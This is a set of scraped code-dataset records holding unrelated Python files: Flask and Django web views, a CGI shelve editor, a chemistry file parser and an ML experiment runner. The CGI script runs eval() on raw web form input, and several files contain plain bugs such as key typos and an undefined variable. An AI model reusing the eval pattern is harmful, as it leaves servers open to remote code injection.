#display bookings\n print(booking)\n\nif __name__ == '__main__':\n app.run(port = 5000, debug = True)\n", "sub_path": "Tutor_System/app/tutee.py", "file_name": "tutee.py", "file_ext": "py", "file_size_in_byte": 6415, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 17, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 98, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 110, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "pika.BlockingConnection", "line_number": 135, "usage_type": "call"}, {"api_name": "pika.ConnectionParameters", "line_number": 135, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 143, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 143, "usage_type": "argument"}, {"api_name": "pika.BasicProperties", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 154, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 154, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 158, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 158, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 159, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 165, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 165, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 166, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 172, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 172, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "549919967", "text": "#-*- coding:utf-8 -*-\n'''\nCreated on 2015年11月23日\n\n@author: 119937\n'''\n'''\n实现用来查看和更新保存在shelve中类实例的基于web的界面;\nshelve保存在服务器上(如果是在本地机器,就是同一个机器)\n'''\nimport cgi,shelve,sys,os\nshelvename='class-shelve'\nfieldnames=('name','age','job','pay')\n\nform = cgi.FieldStorage()\nprint('Content-type:text/html')\nsys.path.insert(0,os.getcwd())\n\n#主html\nreplyhtml=\"\"\"\n\nPeople Input Form\n\n
\n \n
key\n $ROW$\n
\n

\n \n \n

\n\n\n\"\"\"\n#为$ROW$的数据行html\n\nrowhtml = '%s\\n'\nrowshtml=''\n\nfor fieldname in fieldnames:\n rowshtml+=(rowhtml%((fieldname,)*3))\nreplyhtml=replyhtml.replace('$ROW$', rowshtml)\n\ndef htmlize(adict):\n new=adict.copy()\n for field in fieldnames:\n value=new[field]\n new[field]=cgi.escape(repr(value))\n return new\n\ndef fetchRecord(db,form):\n try:\n key=form['key'].value\n record=db[key]\n fields=record.__dict__\n fields['key']=key\n except:\n fields=dict.fromkeys(fieldnames, '?')\n fields['key']='Missing or invalid key!'\n return fields\n\ndef updateRecord(db,form):\n if not 'key' in form:\n fields =dict.fromkeys(fieldnames,'?')\n fields['key']='Missing key input!'\n else:\n key=form['key'].value\n if key in db:\n record = db[key]\n else:\n from com.xpython.src2.person import Person\n record=Person(name='?',age='?')\n for field in fieldnames:\n setattr(record,field,eval(form[field].value))\n db[key]=record\n fields=record.__dict__\n fields['key']=key\n return fields\ndb=shelve.open(shelvename)\naction=form['acton'].value if 'action' in form else None\nif action=='Fech':\n fields=fetchRecord(db,form)\nelif action=='Update':\n fields=updateRecord(db, form)\nelse:\n fields=dict.fromkeys(fieldnames,'?')\n fields['key']='Miss or invaild action'\ndb.close()\nprint(replyhtml%htmlize(fields))", "sub_path": "src/com/xpython/src2/webapp/peoplecgi.py", "file_name": "peoplecgi.py", "file_ext": "py", "file_size_in_byte": 2278, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "cgi.FieldStorage", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 17, "usage_type": "call"}, {"api_name": "cgi.escape", "line_number": 49, "usage_type": "call"}, {"api_name": "com.xpython.src2.person.Person", "line_number": 73, "usage_type": "call"}, {"api_name": "shelve.open", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "551998895", "text": "from io import StringIO\nfrom os.path import join\n\n\nclass TMoleFile(object):\n _parser = []\n\n def __init__(self, directory, filename):\n self.directory = directory\n self.filename = filename\n with open(join(directory, filename)) as f:\n self.raw = StringIO(f.read())\n\n def _run_parsers(self):\n for Parser, kwargs in self.__class__._parser:\n key = Parser.__name__\n if key.endswith('Parser'):\n key = key[:-6]\n for argname in kwargs:\n if callable(kwargs[argname]):\n kwargs[argname] = kwargs[argname](self)\n data = Parser(self.raw, **kwargs)._data\n self.__dict__[key] = data\n", "sub_path": "tmolehelpers/tmole_file.py", "file_name": "tmole_file.py", "file_ext": "py", "file_size_in_byte": 718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "289290140", "text": "import multiprocessing\nimport os\nfrom warnings import simplefilter\n\nsimplefilter(action='ignore', category=FutureWarning)\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\nfrom itertools import product\nfrom shutil import rmtree\nfrom psutil import cpu_count\n\nfrom numpy import savetxt\n\nfrom data_gen import data_gen, data_gen_MNIST, data_gen_REAL\n\nfrom model import regession_model\n\n\ndef work(Coordinator, report_lock, loss_function, loss_para, data, base_path, repeat=1):\n os.makedirs(base_path)\n Model = regession_model(p=data['p'], K=data['K'], loss_function=loss_function, loss_para=loss_para)\n for r in range(repeat):\n if data['Env'] == 'Sim':\n X, Y = data_gen(Nk=data['Nk'], K=data['K'], p=data['p'], seed=hash(\"Train\" + str(r)))\n TX, TY = data_gen(Nk=data['Nk'], K=data['K'], p=data['p'], seed=hash(\"Test\" + str(r)))\n elif data['Env'] == 'MNIST':\n X, Y = data_gen_MNIST(data['Nk'] * data['K'], False, seed=hash(\"Train\" + str(r)))\n TX, TY = data_gen_MNIST(data['Nk'] * data['K'], True, seed=hash(\"Test\" + str(r)))\n elif data['Env'] == 'REAL':\n X, Y, TX, TY = data_gen_REAL(r)\n res = Model.full_auto(X, Y, TX, TY)\n local_path = os.path.join(base_path, str(r))\n os.makedirs(local_path)\n matrix_to_save = {'Cfm_train', 'Cfm_test', 'A', 'B'}\n for m in matrix_to_save:\n savetxt(os.path.join(local_path, str(m) + \".csv\"), res[m], delimiter=\",\")\n if loss_function == 'DWD' or loss_function == 'DWDSM' or loss_function == 'DWDnc':\n loss_para_pad_to_3 = (loss_para['l'], loss_para['alpha'], loss_para['q'])\n elif loss_function == 'logistic':\n loss_para_pad_to_3 = (loss_para['l'], \"-\", \"-\")\n else:\n raise\n\n settings = (data['K'], data['p'], data['Nk'], loss_function)\n rps = (\n str(r), res['Loss_train'], res['Loss_test'], res['Ac_train'], res['Ac_test'], res['large_parameter'],\n res['i'])\n to_report = list(map(lambda x: str(x), settings + loss_para_pad_to_3 + rps))\n report_lock.acquire()\n print(\",\".join(to_report),\n file=open(os.path.join(os.getcwd(), \"results\", \"env=\" + data['Env'], \"sum.csv\"), 'a'))\n report_lock.release()\n Model.reset()\n Coordinator.release()\n return None\n\n\ndef path_gen(Env, K, p, Nk, loss_function, l, al, q):\n return os.path.join(os.getcwd(), \"results\", \"env=\" + str(Env), \"K=\" + str(K), \"p=\" + str(p),\n \"Nk=\" + str(Nk), \"loss_function=\" + str(loss_function), \"Lambda=\" + str(l),\n \"Alpha=\" + str(al), \"q=\" + str(q))\n\n\nif __name__ == '__main__':\n Env = 'Sim'\n Repeat = 100\n Coordinator = multiprocessing.Semaphore(cpu_count(logical = True)+4)\n rmtree(\"./results\", ignore_errors=True)\n os.makedirs(os.path.join(os.getcwd(), \"results\", \"env=\" + str(Env)))\n Names = (\n \"K\", \"p\", \"Nk\", \"Loss_f\", \"Lambda\", \"Alpha\", \"q\", \"id\", \"Loss_train\", \"Loss_test\", \"Ac_train\", \"Ac_test\",\n \"non_zero\", \"i\")\n print(\",\".join(Names), file=open(os.path.join(os.getcwd(), \"results\", \"env=\" + str(Env), \"sum.csv\"), 'w+'),\n flush=True)\n report_lock = multiprocessing.Lock()\n if Env == 'Sim':\n Env_combination = ((3, 150, 50), (3, 150, 100), (3, 300, 50), (3, 300, 100),\n (5, 150, 50), (5, 150, 100), (5, 300, 50), (5, 300, 100))\n for K, p, Nk in reversed(Env_combination):\n # Logistic\n ls = {0.3, 0.1, 0.06, 0.03, 0.01, 0.006, 0.003, 0.001}\n for l in ls:\n base_path = path_gen(Env, K, p, Nk, \"logistic\", l, \"NA\", \"NA\")\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, 'logistic', {'l': l}, {'Env': 'Sim', 'K': K, 'p': p, 'Nk': Nk}, base_path,\n Repeat)).start()\n # DWD\n ls = {0.06, 0.03, 0.01, 0.006, 0.005, 0.004, 0.003, 0.001, 0.0006}\n als = {0.1, 0.5, 0.9}\n qs = {0.5, 1, 20}\n for dwdv in [\"DWDnc\"]: # ,\"DWDnc\",\"DWDSM\"\n for l, al, q in product(ls, als, qs):\n base_path = path_gen(Env, K, p, Nk, dwdv, l, al, q)\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n # report = work (Coordinator,report_lock, 'DWD', {'l':l,'alpha':al,'q':q}, {'K':K,'p':p,'Nk':Nk},base_path,Repeat )\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, dwdv, {'l': l, 'alpha': al, 'q': q},\n {'Env': Env, 'K': K, 'p': p, 'Nk': Nk},\n base_path, Repeat)).start()\n\n elif Env == 'MNIST':\n K = 10\n p = 28 * 28\n for Nk in (50, 100, 200, 700):\n # DWD\n ls = {0.06, 0.03, 0.01, 0.006, 0.005, 0.004, 0.003, 0.001, 0.0006}\n als = {0.1, 0.5, 0.9}\n qs = {0.5, 1, 20}\n for dwdv in [\"DWD\"]: # ,\"DWDnc\",\"DWDSM\"\n for l, al, q in product(ls, als, qs):\n base_path = path_gen(Env, K, p, Nk, dwdv, l, al, q)\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, dwdv, {'l': l, 'alpha': al, 'q': q},\n {'Env': Env, 'K': K, 'p': p, 'Nk': Nk},\n base_path, Repeat)).start()\n # Logistic\n for l in ls:\n base_path = path_gen(Env, K, p, Nk, \"logistic\", l, \"NA\", \"NA\")\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, 'logistic', {'l': l}, {Env: Env, 'K': K, 'p': p, 'Nk': Nk},\n base_path,\n Repeat)).start()\n elif Env == 'REAL':\n K = 4\n p = 1714\n Nk = \"NA\"\n #ls = {3,1,0.6,0.3,0.1,0.06, 0.03, 0.01, 0.006, 0.005, 0.004, 0.003, 0.001, 0.0006,0.0003,0.0001}\n ls = list(map(lambda x: (x)/100,list(range(41))))\n als = {0.1, 0.5, 0.9}\n qs = {0.5, 1, 20}\n for dwdv in [\"DWD\", \"DWDnc\", \"DWDSM\"]: # ,\"DWDnc\",\"DWDSM\"\n for l, al, q in product(ls, als, qs):\n base_path = path_gen(Env, K, p, Nk, dwdv, l, al, q)\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, dwdv, {'l': l, 'alpha': al, 'q': q},\n {'Env': Env, 'K': K, 'p': p, 'Nk': Nk},\n base_path, Repeat)).start()\n # Logistic\n for l in ls:\n base_path = path_gen(Env, K, p, Nk, \"logistic\", l, \"NA\", \"NA\")\n Coordinator.acquire()\n print(\"working on: \" + base_path)\n multiprocessing.Process(target=work, args=(\n Coordinator, report_lock, 'logistic', {'l': l}, {'Env': Env, 'K': K, 'p': p, 'Nk': Nk}, base_path,\n Repeat)).start()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.simplefilter", "line_number": 5, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 19, "usage_type": "call"}, {"api_name": "model.regession_model", "line_number": 20, "usage_type": "call"}, {"api_name": "data_gen.data_gen", "line_number": 23, "usage_type": "call"}, {"api_name": "data_gen.data_gen", "line_number": 24, "usage_type": "call"}, {"api_name": "data_gen.data_gen_MNIST", "line_number": 26, "usage_type": "call"}, {"api_name": "data_gen.data_gen_MNIST", "line_number": 27, "usage_type": "call"}, {"api_name": "data_gen.data_gen_REAL", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 58, "usage_type": "call"}, {"api_name": "multiprocessing.Semaphore", "line_number": 66, "usage_type": "call"}, {"api_name": "psutil.cpu_count", "line_number": 66, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 67, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 72, "usage_type": "call"}, {"api_name": "multiprocessing.Lock", "line_number": 74, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 85, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 93, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 98, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 112, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 116, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 125, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 138, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 142, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 151, "usage_type": "call"}]} +{"seq_id": "63165952", "text": "from django.shortcuts import render, get_object_or_404,get_list_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.db.models import Max\nfrom django.db.models import Q\n\nfrom django.core.files.storage import FileSystemStorage\nfrom chartit import DataPool, Chart\n# Create your views here.\n\nfrom .models import Document, Flows, FlowTemplate, FlowSummary\n\ndef template_upload_handler(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n doctype = request.POST['doctype']\n \n # save file path to DB\n d = Document(path=uploaded_file_url, description=request.POST['description'])\n d.save()\n # save fps template\n d.upload_template(doctype=doctype)\n\n return HttpResponseRedirect(reverse('poc:showtemplate'))\n else:\n return render(request, 'poc/upload_template.html')\n\ndef result_upload_handler(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n doctype = request.POST['doctype']\n description = 'no description' if request.POST['description'] == '' else request.POST['description']\n # save file path to DB\n data = Document(path=uploaded_file_url, description=description, test_set=request.POST['testcase'])\n data.save()\n # calculate result\n if request.POST['service_type'] == 'other':\n try:\n data.save_other_service_result(request.POST['testcase'], doctype)\n except:\n return render(request, 'poc/error.html')\n else:\n try:\n data.save_multicast_service_result(request.POST['testcase'], request.POST['service_type'], doctype)\n except:\n return render(request, 'poc/error.html')\n return HttpResponseRedirect(reverse('poc:resultdetail', args=(request.POST['testcase'],)))\n else:\n latest_flow_set = Document.objects.all().aggregate(Max('test_set'))\n return render(request, 'poc/upload_result.html', latest_flow_set) \n\ndef show_template(request):\n try:\n latest_flow_template = FlowTemplate.objects.all()\n context = {'latest_flow_template': latest_flow_template}\n return render(request, 'poc/flowtemplate.html', context)\n except FlowTemplate.DoesNotExist:\n return render(request, 'poc/flowtemplate.html')\n\ndef show_result(request,test_set):\n try:\n queried_flow = Flows.objects.filter(test_set=test_set)\n latest_flow = []\n for row in queried_flow:\n latest_flow.append( {'flow_name':row.flow_name, 'tx':row.tx, 'rx':row.rx, 'drop_count':row.drop_count, 'drop_time':row.drop_time, 'id':row.id,\n 'test_set':row.test_set, 'service_type':row.service_type, 'bg_service':row.bg_service, 'fps':row.fps,\n 'drop_percent':'N/A' if row.rx <= 0 else round((row.drop_count/row.tx)*100,5)} )\n try:\n desc = Document.objects.filter( ~Q(description='') , test_set=test_set )[0].description\n context = {'latest_flow': latest_flow, 'desc':desc, 'test_set':test_set}\n except IndexError:\n context = {'latest_flow': latest_flow, 'desc':'no description', 'test_set':test_set}\n return render(request, 'poc/result_detail.html', context)\n except Flows.DoesNotExist:\n return render(request, 'poc/result_detail.html')\n\ndef show_all_results(request):\n try:\n uniq_set = {}\n uniq_list = []\n alltestcases = Document.objects.order_by('test_set').values('test_set','description','remark','uploaded_at').distinct()\n for case in alltestcases:\n if case['test_set'] not in uniq_set:\n uniq_list.append( {'test_set':case['test_set'], 'description':case['description'], 'remark':case['remark'], 'uploaded_at':case['uploaded_at'] } )\n uniq_set[case['test_set']] = True\n else:\n if case['description'].strip() not in uniq_list[-1]['description'].strip():\n uniq_list[-1]['description'] += ' :: '+case['description'].strip()\n if len(uniq_list[-1]['description']) > 60:\n uniq_list[-1]['description'] = uniq_list[-1]['description'][:60] + ' ...'\n\n context = {'alltestcases': uniq_list , 'desc':\"All Testcases Results\"}\n return render(request, 'poc/results.html', context)\n except Flows.DoesNotExist:\n return render(request, 'poc/results.html')\n\n# def show_stat(request):\n# return render(request, 'poc/home.html')\n\ndef show_summary(request, test_set):\n try:\n summary_flow = FlowSummary.objects.filter(test_set=test_set)\n try:\n desc = Document.objects.filter( ~Q(description='') , test_set=test_set )[0].description\n context = {'summary_flow': summary_flow, 'desc':\"Summary result for: \"+desc, 'test_set':test_set}\n except IndexError:\n context = {'latest_flow': latest_flow, 'desc':'no description', 'test_set':test_set}\n return render(request, 'poc/summary.html', context)\n except Flows.DoesNotExist:\n return render(request, 'poc/summary.html')\n\ndef edit_remark(request):\n if request.method == 'POST':\n test_set = request.POST['test_set']\n remark = request.POST['remark']\n \n print (test_set, remark)\n doc = Document.objects.filter(test_set=test_set)\n for record in doc:\n record.remark = remark\n record.save()\n return HttpResponseRedirect(reverse('poc:result'))\n\ndef chart_view(request, flow_id):\n flow_name = get_object_or_404(Flows, id=flow_id).flow_name\n\n #From Chartit.\n #Step 1: Create a DataPool with the data we want to retrieve.\n chartdata = DataPool(\n series=\n [\n {\n 'options': { 'source': Flows.objects.filter(flow_name=flow_name).order_by('-pub_date')[:100] },\n 'terms': ['pub_date','drop_time']\n }\n ]\n )\n #Step 2: Create the Chart object\n cht = Chart(\n datasource = chartdata,\n series_options =\n [{'options':{\n 'type': 'line',\n 'stacking': False\n },\n 'terms':{\n 'pub_date': ['drop_time']\n }\n }],\n chart_options =\n {\n 'chart': {'backgroundColor': '#f2f2f2'},\n 'title': {'text': 'Flow: '+flow_name},\n 'yAxis': {'title' : {'text': 'Drop Time (ms)' }},\n }\n )\n\n #Step 3: Send the chart object to the template.\n return render(request,'poc/chart.html', {'chart': cht})", "sub_path": "poc/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7001, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Document", "line_number": 23, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 28, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Document", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 53, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 54, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Document.objects.all", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Document.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.Document", "line_number": 56, "usage_type": "name"}, {"api_name": "django.db.models.Max", "line_number": 56, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "models.FlowTemplate.objects.all", "line_number": 61, "usage_type": "call"}, {"api_name": "models.FlowTemplate.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.FlowTemplate", "line_number": 61, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 63, "usage_type": "call"}, {"api_name": "models.FlowTemplate.DoesNotExist", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.FlowTemplate", "line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Flows.objects.filter", "line_number": 69, "usage_type": "call"}, {"api_name": "models.Flows.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "models.Flows", "line_number": 69, "usage_type": "name"}, {"api_name": "models.Document.objects.filter", "line_number": 76, "usage_type": "call"}, {"api_name": "models.Document.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "models.Document", "line_number": 76, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 76, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Flows.DoesNotExist", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.Flows", "line_number": 81, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 82, "usage_type": "call"}, {"api_name": "models.Document.objects.order_by", "line_number": 88, "usage_type": "call"}, {"api_name": "models.Document.objects", "line_number": 88, "usage_type": "attribute"}, {"api_name": "models.Document", "line_number": 88, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 100, "usage_type": "call"}, {"api_name": "models.Flows.DoesNotExist", "line_number": 101, "usage_type": "attribute"}, {"api_name": "models.Flows", "line_number": 101, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "models.FlowSummary.objects.filter", "line_number": 109, "usage_type": "call"}, {"api_name": "models.FlowSummary.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.FlowSummary", "line_number": 109, "usage_type": "name"}, {"api_name": "models.Document.objects.filter", "line_number": 111, "usage_type": "call"}, {"api_name": "models.Document.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "models.Document", "line_number": 111, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 111, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 115, "usage_type": "call"}, {"api_name": "models.Flows.DoesNotExist", "line_number": 116, "usage_type": "attribute"}, {"api_name": "models.Flows", "line_number": 116, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 117, "usage_type": "call"}, {"api_name": "models.Document.objects.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "models.Document.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "models.Document", "line_number": 125, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 129, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 129, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 132, "usage_type": "call"}, {"api_name": "models.Flows", "line_number": 132, "usage_type": "argument"}, {"api_name": "chartit.DataPool", "line_number": 136, "usage_type": "call"}, {"api_name": "models.Flows.objects.filter", "line_number": 140, "usage_type": "call"}, {"api_name": "models.Flows.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "models.Flows", "line_number": 140, "usage_type": "name"}, {"api_name": "chartit.Chart", "line_number": 146, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "443933999", "text": "# https://github.com/microsoft/pylance-release/issues/236#issuecomment-759828693\nimport json\nimport logging\nfrom flask import Flask, request\nfrom __init__ import setup_logging\nimport urllib3\nimport urllib\nfrom utils.utils import str_to_filename\nimport utils.video_manager as vm\n# import utils.elasticsearch_manager as em \nimport utils.routes_from_file as rff\nimport utils.zip as zip\nimport os\n\n\nlogger = setup_logging()\napp = Flask(__name__)\n\n\ndef try_action(action_fn):\n try: return (action_fn(), 0)\n except Exception as e:\n logging.error(e)\n code, reason, *_ = e.args\n return (reason, code)\n\n\n\n\n\n\n\n\n@app.route('/videos/url/')\ndef get_by_url(url = None): \n data, has_error = try_action(lambda: vm.get_video_by_url(url))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n return json.dumps(vm.to_VideoRecord(data), indent=4), 200, {'ContentType':'application/json'}\n\n@app.route('/videos/id/')\ndef get_by_id(id = None): \n data, has_error = try_action(lambda: vm.get_video_by_id(id))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n return json.dumps(vm.to_VideoRecord(data), indent=4), 200, {'ContentType':'application/json'}\n\n@app.route('/videos/id/', methods=['PUT'])\ndef update_video(id = None): \n\n # Extract and validate data\n data, has_error = try_action(lambda: vm.video_from_user_data(request.json))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n\n # Have we processed this link before? \n data, has_error = try_action(lambda: vm.get_video_by_id(id))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n if data.get('total') == 0: return json.dumps({\"message\": \"Unknown ID\"}, indent=4), 400, {'ContentType':'application/json'}\n\n # Process submission and validate results\n data, has_error = try_action(lambda: vm.process_video(data, is_new=False))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n \n # Commit results\n data, has_error = try_action(lambda: vm.update_video(id, data))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n return json.dumps(data, indent=4), 200, {'ContentType':'application/json'}\n\n\n\n@app.route('/videos/new', methods=['POST'])\ndef new_video(): return add_video(request.json)\n\n@app.route('/videos/new/bulk', methods=['POST'])\ndef new_videos(): \n results = [ add_video(video) for video in request.json ]\n response = {\n \"failed\": [ res[0] for res in results if res[1] != 201],\n \"created\": [ res[0] for res in results if res[1] == 201]\n }\n return json.dumps({\"results\": response}, indent=4), 200, {'ContentType':'application/json'}\n\ndef add_video(user_data): \n\n # Extract and validate data\n data, has_error = try_action(lambda: vm.video_from_user_data(user_data))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n logging.info(f'Processing user data: \\'{json.dumps(data)}\\'')\n link = data.get('url')\n\n # Have we processed this link before? \n _data, has_error = try_action(lambda: vm.get_video_by_url(link))\n if has_error: return json.dumps({\"message\": \"Could not process request\", \"data\": data}, indent=4), has_error, {'ContentType':'application/json'}\n if _data.get('total') != 0: return json.dumps(_data), 200, {'ContentType':'application/json'}\n logging.info(f\"Link '{link}' has not been processed before\")\n\n # Process submission and validate 